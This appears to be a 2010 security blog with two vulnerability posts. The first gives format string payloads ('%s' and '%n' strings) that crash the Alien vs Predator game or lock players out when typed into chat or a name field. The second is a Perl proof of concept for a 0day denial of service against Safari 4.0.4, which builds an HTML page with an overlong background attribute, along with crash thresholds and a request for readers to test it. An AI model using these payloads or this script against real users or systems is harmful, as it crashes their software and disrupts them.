2010-02-27

New 'Alien vs Predator' Format String Bugs

Alien vs Predator (Feb 17 patch) is vulnerable to Format String attacks.

Posting the following in Chat (either in game or in the lobby) will crash your game, I am not sure if it will crash other users, I haven't got anybody to test on.

%s%s%s%s%s%s%s%s%s%s
or
%n%n%n%n%n%n%n%n%n%n

Setting your Name to: '%n' will stop you from ever joining a game, you just get an error reporting your unable to connect.
Setting your Name to '%i' will set your Name to random numbers which changes as you play.

I tried contacting Steam/Rebellion/Sega, but so far had no response.

2010-01-20

New 0Day Safari 'background' DoS

New 0Day Safari DoS I found last night.
Can somebody test to confirm its working for them?
Usage: perl Safari_4.0.4_background_DoS.pl output.htm 114516
Then browse to output.htm in Safari.


#!/usr/bin/perl
#
# Safari 4.0.4 (531.21.10) - Stack Overflow/run
# 0Day DoS POC by John Cobb - www.NoBytes.com - 20/01/2010 - [v1.0]
# Tested on WinXP (32bit) SP3
#
# Magic Numbers:
# 114516 -> 114718 : Safari quits without error
# 114719 : Safari quits with illegal operation:
# AppName: safari.exe
# AppVer: 5.31.21.10
# ModName: cfnetwork.dll
# ModVer: 1.450.5.0
# Offset: 000567a7

$filename = $ARGV[0];
$buffer = $ARGV[1];
if(!defined($filename))
{
print "Usage: $0 <filename.html> <buffer>\n\n";
}

$header = "<html>
<head>" . "\n";
$crash = "<body background = \"" . "A" x $buffer . "\">" . "\n";
$footer = "</html>" . "\n";

$data = $header . $crash . $footer;

open(FILE, '>' . $filename);
print FILE $data;
close(FILE);

exit;